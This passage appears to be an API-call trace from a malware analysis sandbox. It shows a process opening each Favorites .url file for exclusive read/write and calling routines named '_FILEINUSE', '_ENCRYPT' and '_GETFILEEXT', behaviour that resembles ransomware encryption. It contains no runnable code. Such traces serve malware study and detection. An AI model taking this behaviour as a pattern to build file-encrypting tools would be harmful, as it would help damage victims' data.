ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 0x90add8 [0180.745] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.745] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 0x90add8 [0180.745] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.745] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.745] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.745] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.745] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.746] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.746] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.746] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.746] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.746] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.746] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.747] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.747] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.747] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.747] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.747] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.747] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.748] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.748] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.748] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.748] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.748] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.748] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.748] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.748] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.748] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.748] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.748] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN.url", cAlternateFileName="")) returned 0x90add8 [0180.750] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.750] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.750] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSN.url", cAlternateFileName="")) returned 0x90add8 [0180.751] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.751] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.751] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.751] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.751] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.751] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.751] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.751] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.751] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.751] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.751] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.752] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.753] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.754] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.754] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.754] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.754] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.754] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.754] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.754] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.754] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.754] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.754] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.754] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.754] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.754] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.755] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.755] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0x90add8 [0180.756] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.756] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0x90add8 [0180.757] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.757] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.757] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.757] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.757] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.757] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.757] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.757] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.757] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.758] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.760] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.760] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.760] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.761] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.761] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.761] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.761] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.761] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.761] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.761] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.761] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.761] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.761] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.761] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.761] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 0x90add8 [0180.763] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.763] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.763] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 0x90add8 [0180.763] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.764] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.764] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.764] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.764] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.764] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.764] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.765] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.766] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.766] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.766] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.766] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.766] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.767] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.767] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.767] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.767] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.767] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.767] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.767] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.767] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.767] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.767] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 0x90add8 [0180.769] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.769] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Windows Live 